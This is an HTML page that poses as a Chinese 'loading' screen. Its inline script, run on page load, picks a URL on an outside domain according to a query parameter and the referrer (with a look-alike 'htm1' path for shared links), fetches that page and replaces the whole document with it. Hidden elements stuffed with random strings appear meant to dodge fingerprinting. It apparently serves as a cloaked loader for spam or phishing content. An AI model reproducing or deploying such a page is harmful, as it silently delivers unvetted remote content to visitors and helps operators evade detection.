<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WAa5Li {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WAa5Li .qqGFTwbj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WAa5Li .content {
            line-height: 50px;
            text-align: center
        }

        .WAa5Li .img {
            width: 100%
        }

        .WAa5Li .kEMunAPKqW {
            text-align: center
        }

        .WAa5Li .kEMunAPKqW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WAa5Li .kEMunAPKqW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WAa5Li .kEMunAPKqW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WAa5Li .kEMunAPKqW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WAa5Li .kEMunAPKqW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WAa5Li .kEMunAPKqW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WAa5Li .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zhR9zvHQF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dOYsQT = zhR9zvHQF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dOYsQT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dOYsQT +".html?a=share";
		}
		
        jqtmzlz=url+"#"+new Date().getTime();
        jqtmzlz && function() {
            $.get(jqtmzlz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>VrwmWePvMDcYTG2LKcA0kJqhkl1vAMGFL1JKEWshA5l4VeuMZuH0Uh47x</div>
<p  style='display:none'>C6HyerdBPV9SiGV2dqnzid</p>
<p  style='display:none'>C6HyerdBPV9SiGV2dqnzid</p>
<span style='display:none'>EgOj8iQliBVZw57I5BIpxOslIiL33GvIbw2B2XTlLeXte2JsUGje96gbMgcQVmn7evIbY5wvhVFv7JaRo</span>
<li style='display:none' >et85xoOpvnJmaIOLzwSMl5e9bVpukyTEJCnYMJ7FlwRnXXNCpsKmdvOGz6VqeW8WoD6JeGgbrNDgW9nMnHD29T</li>
<p  style='display:none'>C6HyerdBPV9SiGV2dqnzid</p><div class="WAa5Li">
    <div class="qqGFTwbj">
        <div class="kEMunAPKqW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>uCnVrmbrmO9PVvYUtTR98KJ3BiqbYgynV7OXxebnzdycHO</div>
<h1 style='display:none' >Clr1Z6I0PulOhhbn7GNN1H3Z74kjuGizP16KtbxHOutdtlwCmg0vA3L5X8l3bIXPXfILPtwmf0MbGebXsI9R0H1PezysxOLhrYZ7f</h1>
<li style='display:none' >ur0kKo2UTcznAwz9KPDYcuWq2m4WM1YqYiuU82SkccdCrBEuTmoT1tcC</li>
<span style='display:none'>Rsn5CtqVj8arUxwLFNX88WDobKzBTrYYywei32tPl4Bu0jEwrFhJ8KQNGOH3nKVglEKr5</span>
<p  style='display:none'>Phn1oL0HloBcKdVUy378J0ckoVRT382U1JpHt3rPRrm7gzDTF58mdHiUe8ui9KQYJ9DeD9z0PIoH5qozDVYvSiTO4AuTNH</p>
<a  href='#' style='display:none'>Cspm6RAPauMKg</a>
<p  style='display:none'>Phn1oL0HloBcKdVUy378J0ckoVRT382U1JpHt3rPRrm7gzDTF58mdHiUe8ui9KQYJ9DeD9z0PIoH5qozDVYvSiTO4AuTNH</p>
<ul style='display:none' >xClQkDghcooiljzeXyA9oSX2N9Zy2VznWe7ZO0nZnmokMEKvNyu1ZiR0HpxLjcXBXcdzPfAg04eRlkWOYbpukXTfUMbf6</ul></body>
</html>